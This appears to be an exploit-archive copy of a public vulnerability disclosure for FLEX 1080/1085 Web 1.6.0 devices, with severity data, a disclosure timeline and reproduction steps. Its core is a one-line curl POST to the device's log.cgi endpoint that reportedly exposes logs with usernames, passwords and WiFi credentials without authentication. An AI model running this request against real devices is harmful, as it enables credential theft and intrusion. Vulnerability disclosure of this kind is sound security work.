FLEX 1080/1085 Web 1.6.0 Information Disclosure

CVE	Category	Price	Severity
N/A	CWE-200	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2022-03-12

CPE
cpe:cpe:/a:flex:flex:1.6.0

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030051

Below is a copy:

FLEX 1080/1085 Web 1.6.0 Information Disclosure

# Exploit Title: FLEX 1080/1085 Web - Information Disclosure
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux

Title:
================
FLEX 1080/1085 Web - Information Disclosure

Summary:
================
The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive
information such as username and password, WiFi SSID and WiFi password.


Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N


Vulnerability Disclosure Schedule:
============================
* January 13, 2022: An email was sent to support.

* February 13, 2022: I didn't get any response from support.

* February 14, 2022: Vulnerability Disclosure


Affected Product:
================
FLEX 1080/1085 Web v1.6.0


Steps to Reproduce:
================

1. Open a terminal and enter the following command:

curl -X POST http://target.com/sistema/log.cgi -d 'force=1'

After that you will be able to see the hardware logs without having any
authentication.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum